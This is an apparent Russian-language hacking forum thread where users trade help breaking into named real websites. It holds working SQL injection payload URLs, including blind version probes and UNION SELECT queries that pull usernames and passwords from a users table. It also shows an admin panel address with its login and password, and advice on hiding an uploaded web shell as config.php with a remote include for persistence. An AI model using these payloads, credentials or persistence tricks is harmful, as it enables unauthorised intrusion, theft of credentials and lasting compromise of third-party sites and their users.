http://www.sysadmin.mail.ru/rekords_detail.php?id=2 та же самая ошибка и без ковычки,говорит о чем нить?
там сначало было так id=27 потом кавычку я подставил сюда id=2'7 -ошибка, если кавычку поставить после 7 ошибки нет
http://www.tarpanmoscow.ru/index.php?id=36742 - помогите скулю раскрутить, вроде 9 полей нашел но не выводится ни фига..
Там интвал, скорей всего, скули нет. Когда кавычку добавляешь к 27, то интвалится до 27, а когда подставляешь ее между 2 и 7, то интвалится до 2, а в базе записи с id 2, видимо, нет, поэтому и ошибка.
blind http://www.tarpanmoscow.ru/index.php?id=36742 AND Length((version()))=6 http://www.tarpanmoscow.ru/index.php?id=36742 AND ascii(substring((version()),6,1))=53 ver. 5.1.45 --------------------- http://www.tarpanmoscow.ru/admin/ admin : admin1tar
Добрый день. Вопрос по актывным XSS. Нашел простую, пассивную: Так же на этом перловском полуфоруме можно добавлять темы/сообщения от гостя; Вот мои попытки расставить акт.xss: Наверняка, я делаю что-то не правильно... Не подскажете, что именно?!
Помогите раскрутить или советом =) Для НЕэкстрасенсов http://macklaw.com/in_the_news/press_detail.asp?id=-94' Не получается даже вывести версию. В MsAccess, MsSQL не силен. Если не получится то хоть обьясните почему =) Расчитываю на вашу помощь...
auth_root http://macklaw.com/in_the_news/press_detail.asp?id=-94+union+select+1,2,3,4,5,6+from+msysaccessobjects http://macklaw.com/in_the_news/press_detail.asp?id=-94+union+select+1,2,3,password,5,6+from+users http://macklaw.com/in_the_news/press_detail.asp?id=-94+union+select+1,2,3,username,5,6+from+users
Помогите раскрутить скулю. http://banken.ruilen.nl/random.php?catid=473+union+select+version()--+ а вот database() уже не показывает почему то.Пишет Unknown column 'admin_ruilen' in 'where clause' Вывод обрезанный, вроде четвертая версия. Буду рад любым примерам, т.к. опыта маловато... Вывод в ошибке.
спрячь поглубже и переименуй во что-нибудь типа config.php, если всё равно боишься, что удалят сделай удалённый инклуд в странице сайта.
Konqi Огромное спасибо! Вопрос, перебирать поля необходимо только с реально существующей в базе таблицой? Если да, то для удобства просто, таблица msysaccessobjects встречается во всех бд данного типа? Или прийдется наугад подбирать? Если можно, если существуют такие, подкиньте плз. таких таблиц, как в MySQL например information_schema в пятой ветке есть везде.
Konqi огромное тебе спасибо! =) Плюс. Только вопрос, админку не нашел? =) Если нашел или шелл залил, не мог бы скинуть в пм? Хотелось бы конечно увидеть пошагово, какие ты проводишь манипуляции с запросами при взломе. Но это будет наглеж с моей стороны отбирать твое время. Поэтому я изучаю статейку, хотелось бы все повторить на практике, вплоть до заливки шелла. Не тупо скопировать всё за кем то, а разобраться и понять каждый передаваемый параметр...
